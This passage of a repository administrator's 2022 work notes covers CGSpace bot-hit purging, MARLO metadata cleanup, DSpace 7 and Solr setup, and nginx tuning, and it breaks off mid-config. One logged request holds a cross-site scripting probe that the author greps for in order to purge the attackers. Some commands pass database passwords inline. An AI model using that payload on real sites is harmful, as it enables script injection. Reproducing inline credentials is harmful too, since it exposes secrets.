- Also make edits to ~62 affiliations on CGSpace because I noticed they were messed up
- Extract another ~1,600 IPs that had hits since I started the second round of `check-spider-ip-hits.sh` yesterday and purge another 303,594 hits
- This is about 999846 into the original list of 1946968 from yesterday
- A metric fuck ton of the IPs in this batch were from Hetzner
## 2022-07-21
- Extract another ~2,100 IPs that had hits since I started the third round of `check-spider-ip-hits.sh` last night and purge another 763,843 hits
- This is about 1441221 into the original list of 1946968 from two days ago
- Again these are overwhelmingly Hetzner (not surprising since my bot-networks.conf file in nginx is mostly Hetzner)
- I responded to my original request to Atmire about the log4j to reload4j migration in DSpace 6.4
- I had initially requested a comment from them in 2022-05
- Extract another ~1,200 IPs that had hits from the fourth round of `check-spider-ip-hits.sh` earlier today and purge another 74,591 hits
- Now the list of IPs I enumerated from the nginx `bot-networks.conf` is finished
## 2022-07-22
- I created a new Linode instance for testing DSpace 7
- Jose from the CCAFS team sent me the final versions of 3,500+ Innovations, Policies, MELIAs, and OICRs from MARLO
- I re-synced CGSpace with DSpace Test so I can have a newer snapshot of the production data there for testing the CCAFS MELIAs, OICRs, Policies, and Innovations
- I re-created the tip-submit and tip-approve DSpace user accounts for Alliance's new TIP submit tool and added them to the Alliance submitters and Alliance admins groups, respectively
- Start working on updating the Ansible infrastructure playbooks for DSpace 7 stuff
## 2022-07-23
- Start a harvest on AReS
- More work on DSpace 7 related issues in the [Ansible infrastructure playbooks](https://github.com/ilri/rmg-ansible-public)
## 2022-07-24
- More work on DSpace 7 related issues in the [Ansible infrastructure playbooks](https://github.com/ilri/rmg-ansible-public)
## 2022-07-25
- More work on DSpace 7 related issues in the [Ansible infrastructure playbooks](https://github.com/ilri/rmg-ansible-public)
- I see that, for Solr, we will need to copy the DSpace configsets to the writable data directory rather than the default home dir
- The [Taking Solr to production guide](https://solr.apache.org/guide/8_11/taking-solr-to-production.html) recommends keeping the unzipped code separate from the data, which we do in our Solr role already
- So that means we keep the unzipped code in `/opt/solr-8.11.2`, the data directory in `/var/solr/data`, and the DSpace Solr cores in `/var/solr/data/configsets`
- I'm not sure how to integrate that into my playbooks yet
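- The end state we want is roughly this (a sketch; the DSpace source path is an assumption):

```console
# /opt/solr-8.11.2   <- unzipped Solr code (kept read-only)
# /var/solr/data     <- Solr home / writable data directory
# copy the DSpace core configs into Solr's configsets directory ([dspace] is the DSpace install dir)
$ cp -r [dspace]/solr/* /var/solr/data/configsets/
$ chown -R solr:solr /var/solr/data/configsets
```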
- Much to my surprise, Discovery indexing on DSpace 7 was really fast when I did it just now, apparently taking 40 minutes of wall clock time?!:
```console
$ /usr/bin/time -v /home/dspace7/bin/dspace index-discovery -b
The script has started
(Re)building index from scratch.
Done with indexing
The script has completed
Command being timed: "/home/dspace7/bin/dspace index-discovery -b"
User time (seconds): 588.18
System time (seconds): 91.26
Percent of CPU this job got: 28%
Elapsed (wall clock) time (h:mm:ss or m:ss): 40:05.79
Average shared text size (kbytes): 0
Average unshared data size (kbytes): 0
Average stack size (kbytes): 0
Average total size (kbytes): 0
Maximum resident set size (kbytes): 635380
Average resident set size (kbytes): 0
Major (requiring I/O) page faults: 1513
Minor (reclaiming a frame) page faults: 216412
Voluntary context switches: 1671092
Involuntary context switches: 744007
Swaps: 0
File system inputs: 4396880
File system outputs: 74312
Socket messages sent: 0
Socket messages received: 0
Signals delivered: 0
Page size (bytes): 4096
Exit status: 0
```
- Leroy from the Alliance wrote to say that the CIAT Library is back up so I might be able to download all the PDFs
- It had been shut down for a security reason a few months ago and we were planning to download them all and attach them to their relevant items on CGSpace
- I noticed one item that had the PDF already on CGSpace so I'll need to consider that when I eventually do the import
- I had to re-create the tip-submit and tip-approve accounts for Alliance on DSpace Test again
- After I created them last week they somehow got deleted...?!... I couldn't find them or the mel-submit account either!
## 2022-07-26
- Rafael from Alliance wrote to say that the tip-submit account wasn't working on DSpace Test
- I think I need to have the submit account in the *Alliance admin* group in order for it to be able to submit via the REST API, but yesterday I had added it to the submitters group
- Meeting with Peter and Abenet about CGSpace issues
- We want to do a training with IFPRI ASAP
- Then we want to start bringing the comms people from the Initiatives in
- We also want to revive the Metadata Working Group to have discussions about metadata standards, governance, etc
- We walked through DSpace 7.3 to get an idea of what vanilla looks like and start thinking about UI, item display, etc (perhaps we solicit help from some CG centers on Angular?)
- Start looking at the metadata for the 1,637 Innovations that Jose sent last week
- There are still issues with the citation formatting, but I will just fix it instead of asking him again
- I can use these GREL expressions to fix the spacing around "Annual Report2017" and the stray periods:
```console
value.replace(/Annual Report(\d{4})/, "Annual Report $1")
value.replace(/ \./, ".")
```
- Then there are also some other issues with the metadata that I sent to him for comments
- I managed to get DSpace 7 running behind nginx, and figured out how to change the logo to CGIAR and run a local instance using the remote API
## 2022-07-27
- Work on the MARLO Innovations and MELIA
- I had to ask Jose for some clarifications and correct some encoding issues (for example in "Côte d'Ivoire", which appeared all over the place, and stray periods everywhere)
- Work on the DSpace 7.3 theme, which mimics CGSpace's DSpace 6 theme pretty well for now
## 2022-07-28
- Work on the MARLO Innovations
- I had to ask Jose more questions about character encoding and duplicates
- I added a new feature to [csv-metadata-quality](https://github.com/ilri/csv-metadata-quality) to add missing regions to the region column when it is detected that there is a country with missing regions
## 2022-07-30
- Start a full harvest on AReS
<!-- vim: set sw=2 ts=2: -->

---
title: "August, 2022"
date: 2022-08-01T10:22:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-08-01
- Our request to add [CC-BY-3.0-IGO to SPDX](https://github.com/spdx/license-list-XML/issues/1525) was approved a few weeks ago
<!--more-->
## 2022-08-02
- Resume working on the MARLO Innovations
- Last week Jose had sent me an updated CSV with UTF-8 formatting, which was missing the filename column
- I joined it with the older file (stripped down to just the `cg.number` and `filename` columns) and then did the same cleanups I had done last week
- I noticed there are six PDFs unused, so I asked Jose
- Spent some time trying to understand the REST API submission issues that Rafael from CIAT is having with tip-approve and tip-submit
- First, according to my notes in 2020-10, a user must be a *collection admin* in order to submit via the REST API
- Second, a collection must have an "Accept/Reject/Edit Metadata" step defined in the workflow
- Also, I referenced my notes from this gist I had made for exactly this purpose! https://gist.github.com/alanorth/40fc3092aefd78f978cca00e8abeeb7a
## 2022-08-03
- I came up with an interesting idea to add missing countries and AGROVOC terms to the MARLO Innovation metadata
- I copied the abstract column to two new fields: `countrytest` and `agrovoctest` and then used this Jython code as a transform to drop terms that don't match (using CGSpace's country list and list of 1,400 AGROVOC terms):
```python
with open(r"/tmp/cgspace-countries.txt",'r') as f :
countries = [name.rstrip().lower() for name in f]
return "||".join([x for x in value.split(' ') if x.lower() in countries])
```
- Then I joined them with the other country and AGROVOC columns
- I had originally tried to use csv-metadata-quality to look up and drop invalid AGROVOC terms but it was timing out every dozen or so requests
- Then I briefly tried to use lightrdf to export a text file of labels from AGROVOC's RDF, but I couldn't figure it out
- I just realized this will not match countries with spaces in our cell values, ugh... also Jython has weird syntax and errors, and I can't get normal Python code to work here, so I must be missing something
- Then I extracted the titles, dates, and types and added IDs, then ran them through `check-duplicates.py` to find the existing items on CGSpace so I can add them as `dcterms.relation` links:
```console
$ csvcut -l -c dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-08-03-Innovations-Cleaned.csv | sed '1s/line_number/id/' > /tmp/innovations-temp.csv
$ ./ilri/check-duplicates.py -i /tmp/innovations-temp.csv -u dspacetest -db dspacetest -p 'dom@in34sniper' -o /tmp/ccafs-duplicates.csv
```
- There were about 115 with existing items on CGSpace
- Then I did some minor processing and checking of the duplicates file (for example, some titles appear more than once in both files), and joined with the other file (left join):
```console
$ csvjoin --left -c dc.title ~/Downloads/2022-08-03-Innovations-Cleaned.csv ~/Downloads/2022-08-03-Innovations-relations.csv > /tmp/innovations-with-relations.csv
```
- Then I used SAFBuilder to create a SimpleItemArchive and import to DSpace Test:
```console
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
$ dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-08-03-innovations.map
```
- Meeting with Mohammed Salem about harmonizing MEL and CGSpace metadata fields
- I still need to share our results and recommendations with Peter, Enrico, Sara, Svetlana, et al
- I made some minor fixes to csv-metadata-quality while working on the MARLO CRP Innovations
## 2022-08-05
- I discussed issues with the DSpace 7 submission forms on Slack and Mark Wood found that the migration tool creates a non-working submission form
- After updating the class name of the collection step and removing the "complete" and "sample" steps the submission form was working
- Now the issue is that the controlled vocabularies show up like this:
![Controlled vocabulary bug in DSpace 7](/cgspace-notes/2022/08/dspace7-submission.png)
- I think we need to add IDs, I will have to check what the implications of that are
- Note (2022-09-27): see this related change from DSpace 7.3: https://github.com/DSpace/DSpace/pull/8174
- Emilio contacted me last week to say they have re-worked their harvester on Hetzner to use a new user agent: `AICCRA website harvester`
- I verified that I see it in the REST API logs, but I don't see any new stats hits for it
- I do see 11,000 hits from that IP last month when I had the incorrect nginx configuration that was sending a literal `$http_user_agent` so I purged those
- It is lucky that we have `harvest` in the DSpace spider agent example file so Solr doesn't log these hits, nothing needed to be done in nginx
## 2022-08-13
- I noticed there was high load on CGSpace, around 9 or 10
- Looking at the Munin graphs it seems to just be the last two hours or so, with a slight increase in PostgreSQL connections, firewall traffic, and a more noticeable increase in CPU
- DSpace sessions are normal
- The number of unique hosts making requests to nginx is pretty low, though it's only 6AM in the server's time
- I see one IP in Sweden making a lot of requests with a normal user agent: 80.248.237.167
- This host is on Internet Vikings (INTERNETBOLAGET), and I see 140,000 requests from them in Solr
- I see reports of excessive scraping on AbuseIPDB.com
- I'm gonna add their 80.248.224.0/20 to the bot-networks.conf in nginx
- I will also purge all the hits from this IP in Solr statistics
- I also see the core.ac.uk bot making tens of thousands of requests today, but we are already tagging that as a bot in Tomcat's Crawler Session Manager valve, so they should be sharing a Tomcat session with other bots and not creating too many sessions
## 2022-08-15
- Start indexing on AReS
- Add CONSERVATION to ILRI subjects on CGSpace
- I see that AGROVOC has `conservation agriculture` and I suggested that we use that instead
## 2022-08-17
- Peter and Jose sent more feedback about the CRP Innovation records from MARLO
- We expanded the CRP names in the citation and removed the `cg.identifier.url` URLs because they are ugly and will stop working eventually
- The mappings of MARLO links will be done internally with the `cg.number` IDs like "IN-1119" and the Handle URIs
## 2022-08-18
- I talked to Jose about the CCAFS MARLO records
- He still hasn't finished re-processing the PDFs to update the internal MARLO links
- I started looking at the other records (MELIAs, OICRs, Policies) and found some minor issues in the MELIAs so I sent feedback to Jose
- On second thought, I opened the MELIAs file in OpenRefine and it looks OK, so this must have been a parsing issue in LibreOffice when I was checking the file (or perhaps I didn't use the correct quoting when importing)
- Import the original MELIA v2 CSV file into OpenRefine to fix encoding before processing with csvcut/csvjoin
- Then extract the IDs and filenames from the original V2 file and join with the UTF-8 file:
```console
$ csvcut -c 'cg.number (series/report No.)',File ~/Downloads/MELIA-Metadata-v2-csv.csv > MELIA-v2-IDs-Files.csv
$ csvjoin -c 'cg.number (series/report No.)' MELIAs\ metadata\ utf8\ 20220816_JM.csv MELIA-v2-IDs-Files.csv > MELIAs-UTF-8-with-files.csv
```
- Then I imported them into OpenRefine to start metadata cleaning and enrichment
- Make some minor changes to [cgspace-submission-guidelines](https://github.com/ilri/cgspace-submission-guidelines)
- Upgrade to Bootstrap v5.2.0
- Dedupe value pairs and controlled vocabularies before writing them
- Sort the controlled vocabularies before writing them (we don't do this for value pairs because some are added in specific order, like CRPs)
## 2022-08-19
- Peter Ballantyne sent me metadata for 311 Gender items that need to be duplicate checked on CGSpace before uploading
- I spent half an hour in OpenRefine fixing the dates because they only had YYYY, but most abstracts and titles had more specific information about the date
- Then I checked for duplicates:
```console
$ ./ilri/check-duplicates.py -i ~/Downloads/gender-ppts-xlsx.csv -u dspace -db dspace -p 'fuuu' -o /tmp/gender-duplicates.csv
```
- I sent the list of ~130 possible duplicates to Peter to check
- Jose sent new versions of the MARLO Innovation/MELIA/OICR/Policy PDFs
- The idea was to replace tinyurl links pointing to MARLO, but I still see many tinyurl links, some of which point to CGIAR Sharepoint and require a login
- I asked them why they don't just use the original links in the first place in case tinyurl.com disappears
- I continued working on the MARLO MELIA v2 UTF-8 metadata
- I did the same metadata enrichment exercise to extract countries and AGROVOC subjects from the abstract field that I did earlier this month, using a Jython expression to match terms in copies of the abstract field
- It helps to replace some characters with spaces first with this GREL: `value.replace(/[.\/;(),]/, " ")`
- This caught some extra AGROVOC terms, but unfortunately we only check for single-word terms
- Then I checked for existing items on CGSpace matching these MELIA using my duplicate checker:
```console
$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-18-MELIAs-UTF-8-With-Files.csv -u dspace -db dspace -p 'fuuu' -o /tmp/melia-matches.csv
```
- Then I did some minor processing and checking of the duplicates file (for example, some titles appear more than once in both files), and joined with the other file (left join):
```console
$ xsv join --left id ~/Downloads/2022-08-18-MELIAs-UTF-8-With-Files.csv id ~/Downloads/melia-matches-csv.csv > /tmp/melias-with-relations.csv
```
- I had to use `xsv` because `csvcut` was throwing an error detecting the dialect of the input CSVs (?)
- I created a SAF bundle and imported the 749 MELIAs to DSpace Test
- I found thirteen items on CGSpace with dates in format "DD/MM/YYYY" so I fixed those
## 2022-08-20
- Peter sent me back the results of the duplicate checking on the Gender presentations
- There were only a handful of duplicates, so I used the IDs in the spreadsheet to flag and delete them in OpenRefine
- I had a new idea about matching AGROVOC subjects and countries in OpenRefine
- I was previously splitting up the text value field (title/abstract/etc) by spaces and searching for each word in the list of terms/countries like this:
```python
with open(r"/tmp/cgspace-countries.txt", 'r') as f:
    countries = [name.rstrip().lower() for name in f]

return "||".join([x for x in value.split(' ') if x.lower() in countries])
```
- But that misses multi-word terms/countries with spaces, so we can search the other way around by using a regex for each term/country and checking if it appears in the text value field:
```python
import re

with open(r"/tmp/agrovoc-subjects.txt", 'r') as f:
    terms = [name.rstrip().lower() for name in f]

return "||".join([term for term in terms if re.match(r".*\b" + term + r"\b.*", value.lower())])
```
- Now we are only limited by our small (~1,400) list of AGROVOC subjects, so I did an export from PostgreSQL of all `dcterms.subject` values and am looking them up against AGROVOC's API right now:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value AS "dcterms.subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY "dcterms.subject" ORDER BY count DESC) to /tmp/2022-08-20-agrovoc.csv WITH CSV HEADER;
COPY 21685
$ csvcut -c 1 /tmp/2022-08-20-agrovoc.csv | sed 1d > /tmp/all-subjects.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/all-subjects.txt -o 2022-08-20-all-subjects-results.csv
$ csvgrep -c 'number of matches' -m 0 -i /tmp/2022-08-20-all-subjects-results.csv.bak | csvcut -c 1 | sed 1d > /tmp/agrovoc-subjects.txt
$ wc -l /tmp/agrovoc-subjects.txt
11834 /tmp/agrovoc-subjects.txt
```
- Then I created a new column joining the title and abstract, and ran the Jython expression above against this new file with 11,000 AGROVOC terms
- Then I joined that column with Peter's `dcterms.subject` column and then deduplicated it with this Jython:
```console
res = []
[res.append(x) for x in value.split("||") if x not in res]
return "||".join(res)
```
- This is way better, but you end up getting a bunch of countries, regions, and short words like "gates" matching in AGROVOC that are inappropriate (we typically don't tag these in AGROVOC) or incorrect (gates as in the physical structures, not the funding agency)
- I did a text facet in OpenRefine and removed a bunch of these by eye
- Then I finished adding the `dcterms.relation` and CRP metadata flagged by Peter on the Gender presentations
- I'm waiting for him to send me the PDFs and then I will upload them to DSpace Test
## 2022-08-21
- Start indexing on AReS
- The load on CGSpace was around 5.0 today, and now that I started the harvesting it's over 10 for an hour now, sigh...
- I'm going to try an experiment to block Googlebot, bingbot, and Yandex for a week to see if the load goes down
## 2022-08-22
- I tried to re-generate the SAF bundle for the MARLO Innovations after improving the AGROVOC subjects and the v3 PDFs, but six are missing from the v3 zip that are present in the original zip:
- ProjectInnovationSummary-WLE-P500-I78.pdf
- ProjectInnovationSummary-WLE-P452-I699.pdf
- ProjectInnovationSummary-WLE-P518-I696.pdf
- ProjectInnovationSummary-WLE-P442-I740.pdf
- ProjectInnovationSummary-WLE-P516-I647.pdf
- ProjectInnovationSummary-WLE-P438-I585.pdf
- I downloaded them manually using the URLs in the original CSV
- I also uploaded a new version of the MELIAs to DSpace Test
## 2022-08-23
- Checking the number of items on CGSpace so we can keep an eye on the 100,000 number:
```console
dspace=# SELECT COUNT(uuid) FROM item WHERE in_archive='t';
count
-------
95716
(1 row)
```
- If I check OAI I see more, but perhaps that counts mapped items multiple times
- Peter said the 303 Gender PPTs were good to go, so I updated the collection mappings and IDs in OpenRefine and then uploaded them to CGSpace:
```console
$ dspace import --add --eperson=fuu@fuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-08-23-gender-ppts.map
```
- I created a [GitHub issue for OpenRXV compatibility issues with DSpace 7](https://github.com/ilri/OpenRXV/issues/133)
## 2022-08-24
- Start working on the MARLO OICRs
- First I extracted the filenames and IDs from the v2 metadata file, then joined it with the UTF-8 version:
```console
$ xsv select 'cg.number (series/report No.),File' OICRS\ Metadata\ v2.csv > /tmp/OICR-files.csv
$ xsv join --left 'cg.number (series/report No.)' OICRS\ metadata\ utf8\ 20220816_JM.csv 'cg.number (series/report No.)' /tmp/OICR-files.csv > OICRs-UTF-8-with-files.csv
```
- After that I imported it into OpenRefine for data cleaning
- To enrich the metadata I combined the title and abstract into a new field and then checked my list of 11,000 AGROVOC terms against it
- First, create a new column with this GREL:
```console
cells["dc.title"].value + " " + cells["dcterms.abstract"].value
```
- Then use this Jython:
```python
import re
with open(r"/tmp/agrovoc-subjects.txt",'r') as f :
terms = [name.rstrip().lower() for name in f]
return "||".join([term for term in terms if re.match(r".*\b" + term + r"\b.*", value.lower())])
```
- After that I de-duplicated the terms using this Jython:
```python
res = []
[res.append(x) for x in value.split("||") if x not in res]
return "||".join(res)
```
- Then I split the multi-values on "||" and used a text facet to remove some countries and other nonsense terms that matched, like "gates" and "al" and "s"
- Then I did the same for countries
- Then I exported the CSV and started searching for duplicates so that I can add them as relations:
```console
$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-24-OICRs.csv -u dspace -db dspace -p 'omg' -o /tmp/oicrs-matches.csv
```
- Oh wow, I actually found one OICR already uploaded to CGSpace... I have to ask Jose about that
## 2022-08-25
- I started processing the MARLO Policies in OpenRefine, similar to the Innovations, MELIAs, and OICRs above
- I also re-ran the AGROVOC matching on Innovations because my technique has improved since I ran it a few weeks ago
## 2022-08-29
- Start a harvest on AReS
- Meeting with Peter and Abenet about CGSpace issues
- I mapped the one MARLO OICR duplicate from the CCAFS Reports collection and deleted it from the OICRs CSV
## 2022-08-30
- Manuel from the "Alianza SIDALC" in South America contacted me asking for permission to harvest CGSpace and include our content in their system
- I responded that we would be glad if they harvested us, and that they should use a descriptive user agent so we can contact them in case of any issues or changes on the server
- I emailed ILRI ICT to ask how Abenet and I can use the CGSpace Support email address in our email applications because we haven't checked that account in years
- I tried to log in on office365.com but it gave an error
- I got access to the account and cleaned up the inbox, unsubscribed from a bunch of Microsoft and Yammer feeds, etc
- Remind Dani, Tariku, and Andrea about the legacy links that we want to update on ILRI's website:
- http://mahider.ilri.org → https://cgspace.cgiar.org
- http://mahider.ilri.org/handle/10568/xxxxx → https://hdl.handle.net/10568/xxxxx
- http://www.ilri.org/ilrinews/index.php/archives/xxxx → https://newsarchive.ilri.org/archives/xxxx
- Join the MARLO OICRs with their relations that I processed a few days ago (minus the second id column and some others):
```console
$ xsv join --left id ~/Downloads/2022-08-24-OICRs.csv id ~/Downloads/oicrs-matches-csv.csv | xsv select '!id[1],Your Title,Their Title,Similarity,Your Date,Their Date,datediff' > /tmp/oicrs-with-relations.csv
```
- Then I cleaned them with csv-metadata-quality to catch some duplicates, add regions, etc and re-imported to OpenRefine
- I flagged a few duplicates for Jose and he'll let me know what to do with them
- I imported the OICRs to DSpace Test:
```console
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
$ dspace import --add --eperson=fuuuu@fuuu.com --source /tmp/SimpleArchiveFormat-oicrs --mapfile=./2022-08-30-OICRs.map
```
- Meeting with Marie-Angelique, Abenet, Valentina, Sara, and Margarita about Types
- I am testing the `org.apache.cocoon.uploads.autosave=false` setting for XMLUI so that files posted via multi-part forms get memory mapped instead of written to disk
- Check the MARLO Policies for relations and join them with the main CSV file:
```console
$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-25-Policies-UTF-8-With-Files.csv -u dspace -db dspace -p 'fuui' -o /tmp/policies-matches.csv
$ xsv join --left id ~/Downloads/2022-08-25-Policies-UTF-8-With-Files.csv id /tmp/policies-matches.csv | xsv select '!id[1],Your Title,Their Title,Similarity,Your Date,Their Date' > /tmp/policies-with-relations.csv
```
<!-- vim: set sw=2 ts=2: -->

---
title: "September, 2022"
date: 2022-09-01T09:41:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-09-01
- A bit of work on the "Mapping CG Core / CGSpace / MEL / MARLO Types" spreadsheet
- I tested an item submission on DSpace Test with the Cocoon `org.apache.cocoon.uploads.autosave=false` change
- The submission works as expected
- Start debugging some region-related issues with csv-metadata-quality
- I created a new test file `test-geography.csv` with some different scenarios
- I also fixed a few bugs and improved the region-matching logic
<!--more-->
- I filed [an issue for the "South-eastern Asia" case mismatch in country_converter](https://github.com/konstantinstadler/country_converter/issues/115) on GitHub
- Meeting with Moayad to discuss OpenRXV developments
- He demoed his new multiple dashboards feature and I helped him rebase those changes to master so we can test them more
## 2022-09-02
- I worked a bit more on exclusion and skipping logic in csv-metadata-quality
- I also pruned and updated all the Python dependencies
- Then I released [version 0.6.0](https://github.com/ilri/csv-metadata-quality/releases/tag/v0.6.0) now that the excludes and region matching support is working way better
## 2022-09-05
- Started a harvest on AReS last night
- Looking over the Solr statistics from last month I see many user agents that look suspicious:
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C)
- Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko) Chrome / 77.0.3865.90 Safari / 537.36
- Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0
- Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20110204 Firefox/4.0b12pre
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Edge/44.18363.8131
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
- Mozilla/4.0 (compatible; MSIE 4.5; Windows 98;)
- curb
- bitdiscovery
- omgili/0.5 +http://omgili.com
- Mozilla/5.0 (compatible)
- Vizzit
- Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0
- Mozilla/5.0 (Android; Mobile; rv:13.0) Gecko/13.0 Firefox/13.0
- Java/17-ea
- AdobeUxTechC4-Async/3.0.12 (win32)
- ZaloPC-win32-24v473
- Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
- Scoop.it
- Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- ows NT 10.0; WOW64; rv: 50.0) Gecko/20100101 Firefox/50.0
- WebAPIClient
- Mozilla/5.0 Firefox/26.0
- Mozilla/5.0 (compatible; woorankreview/2.0; +https://www.woorank.com/)
- For example, some are apparently using versions of Firefox that are over ten years old, and some are obviously trying to look like valid user agents, but making typos (`Mozilla / 5.0`)
- Tons of hosts are making requests like this:
```console
GET /bitstream/handle/10568/109408/Milk%20testing%20lab%20protocol.pdf?sequence=1&isAllowed=\x22><script%20>alert(String.fromCharCode(88,83,83))</script> HTTP/1.1" 400 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0
```
- I got a list of hosts making requests like that so I can purge their hits:
```console
# zcat /var/log/nginx/{access,library-access,oai,rest}.log.[123]*.gz | grep 'String.fromCharCode(' | awk '{print $1}' | sort -u > /tmp/ips.txt
```
- I purged 4,718 hits from IPs
- I see some new Hetzner ranges that I hadn't blocked yet apparently?
- I got a [list of Hetzner's IPs from IP Quality Score](https://www.ipqualityscore.com/asn-details/AS24940/hetzner-online-gmbh) then added them to the existing ones in my Ansible playbooks:
```console
$ awk '{print $1}' /tmp/hetzner.txt | wc -l
36
$ sort -u /tmp/hetzner-combined.txt | wc -l
49
```
- I will add this new list to nginx's `bot-networks.conf` so they get throttled on scraping XMLUI and get classified as bots in Solr statistics
- Then I purged hits from the following user agents:
```console
$ ./ilri/check-spider-hits.sh -f /tmp/agents
Found 374 hits from curb in statistics
Found 350 hits from bitdiscovery in statistics
Found 564 hits from omgili in statistics
Found 390 hits from Vizzit in statistics
Found 9125 hits from AdobeUxTechC4-Async in statistics
Found 97 hits from ZaloPC-win32-24v473 in statistics
Found 518 hits from nbertaupete95 in statistics
Found 218 hits from Scoop.it in statistics
Found 584 hits from WebAPIClient in statistics
Total number of hits from bots: 12220
```
- Then I will add these user agents to the ILRI spider override in DSpace
## 2022-09-06
- I'm testing dspace-statistics-api with our DSpace 7 test server
- After setting up the env and the database the `python -m dspace_statistics_api.indexer` runs without issues
- While playing with Solr I tried to search for statistics from this month using `time:2022-09*` but I get this error: "Can't run prefix queries on numeric fields"
- I guess that the syntax in Solr changed since 4.10...
- This works, but is super annoying: `time:[2022-09-01T00:00:00Z TO 2022-09-30T23:59:59Z]`
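- For example, to count last month's hits with a range query (assuming the default Solr host and the statistics core):
```console
# rows=0 returns just the numFound count for the date range
$ curl -s 'http://localhost:8983/solr/statistics/select?q=time:%5B2022-09-01T00:00:00Z%20TO%202022-09-30T23:59:59Z%5D&rows=0'
```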
## 2022-09-07
- I tested the controlled-vocabulary changes on DSpace 6 and they work fine
- Last week I found that DSpace 7 is more strict with controlled vocabularies and requires IDs for all node values
- This is a pain because it means I have to re-do the IDs in each file every time I update them
- If I add `id="0000"` to each, then I can use [this vim expression](https://vim.fandom.com/wiki/Making_a_list_of_numbers#Substitute_with_ascending_numbers) `let i=0001 | g/0000/s//\=i/ | let i=i+1` to replace the numbers with increments starting from 1
- Meeting with Marie Angelique, Abenet, Sara, and Margarita to continue the discussion about Types from last week
- We made progress with concrete actions and will continue next week
## 2022-09-08
- I had a meeting with Nicky from UNEP to discuss issues they are having with their DSpace
- I told her about the meeting of DSpace community people that we're planning at ILRI in the next few weeks
## 2022-09-09
- Add some value mappings to AReS because I see a lot of incorrect regions and countries
- I also found some values that were blank in CGSpace so I deleted them:
```console
dspace=# BEGIN;
BEGIN
dspace=# DELETE FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value='';
DELETE 70
dspace=# COMMIT;
COMMIT
```
- Start a full Discovery reindex on CGSpace to catch these changes in Discovery
## 2022-09-11
- Today is Sunday and I see the load on the server is high
- Google and a bunch of other bots have been blocked on XMLUI for the past two weeks so it's not from them!
- Looking at the top IPs this morning:
```console
# cat /var/log/nginx/{access,library-access,oai,rest}.log /var/log/nginx/{access,library-access,oai,rest}.log.1 | grep '11/Sep/2022' | awk '{print $1}' | sort | uniq -c | sort -h | tail -n 40
...
165 64.233.172.79
166 87.250.224.34
200 69.162.124.231
202 216.244.66.198
385 207.46.13.149
398 207.46.13.147
421 66.249.64.185
422 157.55.39.81
442 2a01:4f8:1c17:5550::1
451 64.124.8.36
578 137.184.159.211
597 136.243.228.195
1185 66.249.64.183
1201 157.55.39.80
3135 80.248.237.167
4794 54.195.118.125
5486 45.5.186.2
6322 2a01:7e00::f03c:91ff:fe9a:3a37
9556 66.249.64.181
```
- The top is still Google, but all the requests are HTTP 503 because I classified them as bots for XMLUI at least
- Then there's 80.248.237.167, which is using a normal user agent and scraping Discovery
- That IP is on Internet Vikings aka Internetbolaget and we are already marking that subnet as 'bot' for XMLUI so most of these requests are HTTP 503
- On another note, I'm curious to explore enabling caching of certain REST API responses
- For example, where the use is for harvesting rather than actual clients getting bitstreams or thumbnails, it seems there might be a benefit to speeding these up for subsequent requestors:
```console
# awk '{print $7}' /var/log/nginx/rest.log | grep -v retrieve | sort | uniq -c | sort -h | tail -n 10
4 /rest/items/3f692ddd-7856-4bf0-a587-99fb3df0688a/bitstreams
4 /rest/items/3f692ddd-7856-4bf0-a587-99fb3df0688a/metadata
4 /rest/items/b014e36f-b496-43d8-9148-cc9db8a6efac/bitstreams
4 /rest/items/b014e36f-b496-43d8-9148-cc9db8a6efac/metadata
5 /rest/handle/10568/110310?expand=all
5 /rest/handle/10568/89980?expand=all
5 /rest/handle/10568/97614?expand=all
6 /rest/handle/10568/107086?expand=all
6 /rest/handle/10568/108503?expand=all
6 /rest/handle/10568/98424?expand=all
```
- I specifically have to not cache things like requests for bitstreams because those are from actual users and we need to keep the real requests so we get the statistics hit
- Will be interesting to check the results above as the day goes on (now 10AM)
- To estimate the potential savings from caching I will check how many non-bitstream requests are made versus how many are made more than once (updated the next morning using yesterday's log):
```console
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort -u | wc -l
33733
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 > 1' | wc -l
5637
```
- In the afternoon I started a harvest on AReS (which should affect the numbers above also)
- I enabled an nginx proxy cache on DSpace Test for this location regex: `location ~ /rest/(handle|items|collections|communities)/.+`
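- The relevant nginx pieces are roughly these (a sketch; the sizes, validity time, and upstream name are illustrative rather than the exact values):
```console
proxy_cache_path /var/cache/nginx/rest_cache levels=1:2 keys_zone=rest_cache:1m max_size=1g inactive=24h;

location ~ /rest/(handle|items|collections|communities)/.+ {
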